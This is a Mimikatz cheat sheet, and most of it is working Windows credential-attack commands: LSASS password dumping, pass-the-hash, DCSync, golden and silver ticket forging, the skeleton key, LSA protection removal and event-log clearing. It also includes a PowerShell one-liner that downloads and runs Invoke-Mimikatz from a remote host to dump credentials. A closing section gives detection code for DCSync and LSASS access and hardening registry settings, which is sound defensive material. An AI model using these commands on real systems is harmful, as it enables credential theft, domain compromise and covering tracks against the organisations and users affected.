# Mimikatz Cheat Sheet

## Synopsis

Mimikatz is a powerful credential dumping and manipulation tool developed by Benjamin Delpy (@gentilkiwi). It can extract clear-text passwords, hashes, PIN codes and Kerberos tickets from memory, and can carry out attacks such as pass-the-hash, pass-the-ticket and golden ticket creation.

Warning: Mimikatz is a security testing tool that can be used maliciously. Use it only in environments where you have explicit permission to do so.
## Obtaining Mimikatz

### Official repository

- GitHub: https://github.com/gentilkiwi/mimikatz
- Latest release: [URL_1__)

### Precompiled binaries

- `mimikatz.exe`: 32-bit executable
- `mimikatz_trunk.zip`: contains both the 32-bit and 64-bit executables

### Compiling from source

```
git clone https://github.com/gentilkiwi/mimikatz.git
# Open the solution file in Visual Studio and build
```
## Basic Usage

### Running Mimikatz

```
# Run directly
mimikatz.exe

# Run with PowerShell
powershell -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz"

# Run from memory
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
```

### Elevated privileges

Most modules that read LSASS memory require the debug privilege:

```
privilege::debug
```

### Getting help

```
help
<module>::
<module>::<command> /?
```

### Exiting Mimikatz

```
exit
```
## Basic Modules and Commands

### sekurlsa Module (LSASS Memory Access)

| Command | Description |
|---|---|
| `sekurlsa::logonpasswords` | Extract all logon passwords |
| `sekurlsa::tickets` | Extract Kerberos tickets |
| `sekurlsa::ekeys` | Extract Kerberos encryption keys |
| `sekurlsa::dpapi` | Extract DPAPI master keys |
| `sekurlsa::credman` | Extract credentials from Windows Credential Manager |
| `sekurlsa::msv` | Extract MSV authentication information |
| `sekurlsa::tspkg` | Extract TSPKG authentication information |
| `sekurlsa::wdigest` | Extract WDigest authentication information |
| `sekurlsa::kerberos` | Extract Kerberos authentication information |
| `sekurlsa::ssp` | Extract SSP authentication information |
| `sekurlsa::livessp` | Extract LiveSSP authentication information |
| `sekurlsa::cloudap` | Extract CloudAP authentication information |
### lsadump Module (SAM and Active Directory)

| Command | Description |
|---|---|
| `lsadump::sam` | Extract hashes from the SAM database |
| `lsadump::secrets` | Extract LSA secrets |
| `lsadump::cache` | Extract cached domain credentials |
| `lsadump::dcsync` | Perform a DCSync attack to retrieve password data |
| `lsadump::lsa` | Extract LSA secrets |
| `lsadump::trust` | Extract domain trust keys |
| `lsadump::backupkeys` | Extract domain backup keys |
### kerberos Module (Ticket Manipulation)

| Command | Description |
|---|---|
| `kerberos::list` | List all Kerberos tickets |
| `kerberos::purge` | Purge all Kerberos tickets |
| `kerberos::ptt` | Pass-the-ticket (inject a ticket) |
| `kerberos::golden` | Create a golden ticket |
| `kerberos::silver` | Create a silver ticket |
| `kerberos::tgt` | Create a TGT |
| `kerberos::hash` | Calculate Kerberos keys from a password |
### crypto Module (Cryptographic Operations)

| Command | Description |
|---|---|
| `crypto::certificates` | List certificates |
| `crypto::keys` | List keys |
| `crypto::system` | List system certificates |
| `crypto::capi` | List CAPI certificates |
| `crypto::cng` | List CNG certificates |
| `crypto::stores` | List certificate stores |
### vault Module (Windows Vault Access)

| Command | Description |
|---|---|
| `vault::cred` | List credentials in the Windows Vault |
| `vault::list` | List vault credentials |
### token Module (Token Manipulation)

| Command | Description |
|---|---|
| `token::whoami` | Display current token information |
| `token::list` | List all tokens |
| `token::elevate` | Elevate token privileges |
| `token::revert` | Revert token |
| `token::run` | Run a process with a token |
### privilege Module (Privilege Management)

| Command | Description |
|---|---|
| `privilege::debug` | Enable the debug privilege |
| `privilege::driver` | Load a driver |
### event Module (Event Log Management)

| Command | Description |
|---|---|
| `event::clear` | Clear event logs |
| `event::drop` | Drop event logs |
### ts Module (Terminal Services)

| Command | Description |
|---|---|
| `ts::sessions` | List Terminal Services sessions |
| `ts::multirdp` | Enable multiple RDP sessions |
### misc Module (Miscellaneous)

| Command | Description |
|---|---|
| `misc::cmd` | Command prompt |
| `misc::regedit` | Registry editor |
| `misc::taskmgr` | Task manager |
| `misc::ncroutemon` | Network connection route monitor |
| `misc::detours` | Detours detection |
| `misc::skeleton` | Install a skeleton key |
## Common Attack Techniques

### Credential Dumping

Extract logon passwords from LSASS memory:

```
privilege::debug
sekurlsa::logonpasswords
```

Extract hashes from the SAM database:

```
privilege::debug
token::elevate
lsadump::sam
```

Extract cached domain credentials:

```
privilege::debug
lsadump::cache
```

Extract credentials from an LSASS minidump:

```
# Create dump with Task Manager or procdump
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
```
### Pass-the-Hash Attacks

Pass-the-hash with an NTLM hash:

```
sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:E52CAC67419A9A224A3B108F3FA6CB6D
```

Pass-the-hash with AES keys:

```
sekurlsa::pth /user:Administrator /domain:contoso.local /aes256:E52CAC67419A9A224A3B108F3FA6CB6D1234567890ABCDEF1234567890ABCDEF
```

Over-pass-the-hash (convert NTLM to Kerberos):

```
sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:E52CAC67419A9A224A3B108F3FA6CB6D /run:powershell.exe
```
### DCSync Attack

```
lsadump::dcsync /domain:contoso.local /all
lsadump::dcsync /domain:contoso.local /user:Administrator
lsadump::dcsync /domain:contoso.local /user:krbtgt
```
### Kerberos Ticket Attacks

List Kerberos tickets:

```
kerberos::list
```

Create a golden ticket:

```
# Format: kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:KRBTGT_HASH /ticket:OUTPUT_FILE
kerberos::golden /user:Administrator /domain:contoso.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:HASH /ticket:golden.kirbi
```

Create a silver ticket (also built with `kerberos::golden`, but scoped to one service with `/target` and `/service`):

```
# Format: kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /target:SERVER /service:SERVICE /rc4:SERVICE_HASH /ticket:OUTPUT_FILE
kerberos::golden /user:Administrator /domain:contoso.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /target:server.contoso.local /service:HTTP /rc4:HASH /ticket:silver.kirbi
```

Pass-the-ticket:

```
kerberos::ptt golden.kirbi
```

Purge tickets:

```
kerberos::purge
```
### Skeleton Key Attack

```
privilege::debug
misc::skeleton
```
## Advanced Techniques

### LSA Protection Bypass

```
# Load mimikatz driver
mimidrv::service
# Enable debug privilege
privilege::debug
# Load driver
!+
# Remove LSASS protection
!processprotect /process:lsass.exe /remove
# Extract credentials
sekurlsa::logonpasswords
```

### Remote Operations

```
# Create process dump of LSASS
# Using Task Manager or procdump:
# procdump.exe -accepteula -ma lsass.exe lsass.dmp

# Analyze dump file
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
```

### Extract Domain Backup Keys

```
lsadump::backupkeys /system:dc01.contoso.local /export
```
## Command Examples with Parameters

### sekurlsa::logonpasswords

```
sekurlsa::logonpasswords [/patch]
```

### sekurlsa::pth

```
sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:HASH [/run:COMMAND]
sekurlsa::pth /user:USERNAME /domain:DOMAIN /aes128:HASH [/run:COMMAND]
sekurlsa::pth /user:USERNAME /domain:DOMAIN /aes256:HASH [/run:COMMAND]
```

### lsadump::dcsync

```
lsadump::dcsync /domain:DOMAIN /user:USERNAME [/guid:{object-guid}]
lsadump::dcsync /domain:DOMAIN /all [/csv]
```

### kerberos::golden

```
kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:HASH [/id:USER_ID] [/groups:GROUP_IDS] [/ticket:OUTPUT_FILE]
```

### kerberos::ptt

```
kerberos::ptt TICKET_FILE
```
## Defensive Measures

### Detection Methods

- Monitor for process creation of `mimikatz.exe` or suspicious processes accessing `lsass.exe`
- Monitor for suspicious LSASS memory access
- Monitor for DCSync operations (replication requests from machines that are not domain controllers)
- Monitor for Kerberos ticket creation and manipulation
- Monitor for privilege escalation
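The following added example (not part of the original cheat sheet) implements two of the detections listed above over constructed sample events: DCSync via Security event 4662 carrying the replication control-access GUIDs from an account that is not a domain controller, and suspicious LSASS handle opens via Sysmon event 10. Field names follow the real event schemas; the sample records, the DC account list and the process allow-list are assumptions for illustration.

```python
import re

# Control-access-right GUIDs that a DCSync (lsadump::dcsync) request exercises on the
# domain object; they appear in the Properties field of Security event 4662.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
DC_ACCOUNTS = {"DC01$", "DC02$"}  # constructed allow-list: DC computer accounts replicate legitimately
# Constructed allow-list of processes expected to open lsass.exe; tune per environment.
LSASS_SOURCE_ALLOW = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe"}
PROCESS_VM_READ = 0x0010  # access right needed to read LSASS memory

def is_dcsync(event: dict) -> bool:
    """Security 4662: replication rights exercised by an account that is not a DC."""
    if event.get("EventID") != 4662:
        return False
    guids = set(re.findall(r"[0-9a-f-]{36}", event.get("Properties", "").lower()))
    return bool(guids & REPLICATION_GUIDS) and event.get("SubjectUserName", "").upper() not in DC_ACCOUNTS

def is_lsass_access(event: dict) -> bool:
    """Sysmon 10: a non-allow-listed process opened lsass.exe with memory-read access."""
    if event.get("EventID") != 10 or not event.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return False
    granted = int(event.get("GrantedAccess", "0x0"), 16)
    return bool(granted & PROCESS_VM_READ) and event.get("SourceImage", "").lower() not in LSASS_SOURCE_ALLOW

def triage(events):
    """Return (rule_name, event) for every event that matches a detection rule."""
    hits = []
    for e in events:
        if is_dcsync(e):
            hits.append(("dcsync", e))
        elif is_lsass_access(e):
            hits.append(("lsass_access", e))
    return hits
# Constructed sample events (field names follow the real event schemas; values are made up).
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "jdoe",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"EventID": 10, "SourceImage": r"C:\Users\jdoe\Downloads\mimikatz.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
]

if __name__ == "__main__":
    for rule, ev in triage(SAMPLE_EVENTS):
        print(rule, ev.get("SubjectUserName") or ev.get("SourceImage"))
```

Only the second and fourth sample events are flagged: the DC computer account and the allow-listed csrss.exe are expected behaviour, so the rules stay quiet for them.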
### Prevention Methods

- Enable LSA Protection (RunAsPPL):

```
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 1 /f
```

- Enable Credential Guard (Windows 10 / Server 2016 and later)
- Use the Protected Users security group
- Disable WDigest authentication:

```
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 0 /f
```

- Implement Just Enough Administration (JEA)
- Rotate passwords regularly
- Limit administrative privileges
- Use strong passwords

## Resources